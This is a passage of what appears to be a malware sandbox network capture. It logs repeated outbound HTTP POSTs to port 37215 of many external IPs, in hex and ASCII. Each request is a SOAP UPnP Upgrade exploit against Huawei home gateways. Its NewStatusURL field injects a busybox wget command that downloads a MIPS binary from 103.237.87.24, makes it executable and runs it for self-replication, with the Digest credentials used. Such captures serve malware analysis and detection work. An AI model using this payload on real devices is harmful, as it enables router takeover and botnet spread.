6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  292192.168.2.134454413.136.246.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098103046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  293192.168.2.135694436.209.120.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098123074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  294192.168.2.133346441.109.203.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098134995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  295192.168.2.1344706157.233.19.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098139048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  296192.168.2.1353004157.117.80.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098165035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  297192.168.2.1355086191.60.197.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098186016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  298192.168.2.1352808197.79.230.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098195076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  299192.168.2.1348870157.13.22.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098202944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  300192.168.2.1351520168.209.173.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098213911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  301192.168.2.1338568197.145.157.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098237038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  302192.168.2.1337620157.240.12.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098249912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
